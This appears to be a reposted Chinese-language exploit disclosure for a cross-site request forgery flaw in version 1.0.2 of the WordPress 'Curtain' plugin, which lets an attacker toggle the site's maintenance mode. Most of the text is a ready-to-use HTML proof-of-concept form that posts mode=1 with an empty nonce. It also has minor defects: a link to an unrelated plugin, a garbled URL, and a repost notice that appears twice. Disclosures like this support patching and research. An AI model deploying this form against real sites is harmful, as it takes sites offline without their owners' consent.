# 供应商主页:https://wordpress.org/plugins/curtain/
<https://wordpress.org/plugins/amministrazione-aperta/>
# 版本:1.0.2
# 测试:火狐
已在窗帘中发现跨站点伪造漏洞允许攻击者激活或专用的 WordPress 插件站点维护模式。
## 易受攻击的网址:
http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=
<http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0>1
<html>
<body>
<form action="http://localhost:10003/wp-admin/options-general.php">
<input type="hidden" name="page" value="curtain" />
<input type="hidden" name="_wpnonce" value="" />
<input type="hidden" name="mode" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。